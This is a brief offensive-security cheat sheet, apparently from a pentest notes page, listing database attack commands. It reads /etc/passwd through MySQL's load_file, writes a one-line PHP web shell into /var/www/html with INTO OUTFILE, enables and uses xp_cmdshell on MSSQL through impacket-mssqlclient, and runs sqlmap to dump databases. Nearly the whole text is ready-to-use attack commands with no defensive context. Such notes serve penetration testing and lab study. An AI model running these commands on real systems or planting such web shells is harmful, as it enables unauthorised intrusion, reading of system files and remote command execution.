MySQL (3306)

mysql -h <IP> -u root -p
show databases;
select load_file("/etc/passwd");
select "<?php system($_GET['c']); ?>" into outfile "/var/www/html/shell.php";

MSSQL (1433)

impacket-mssqlclient user:pass@<IP>
> enable_xp_cmdshell
> xp_cmdshell whoami

SQLMap

sqlmap -u "[http://site.com?id=1](http://site.com?id=1)" --dbs --batch
sqlmap -r req.txt --dbs  # Para POST requests

Categories:

Updated: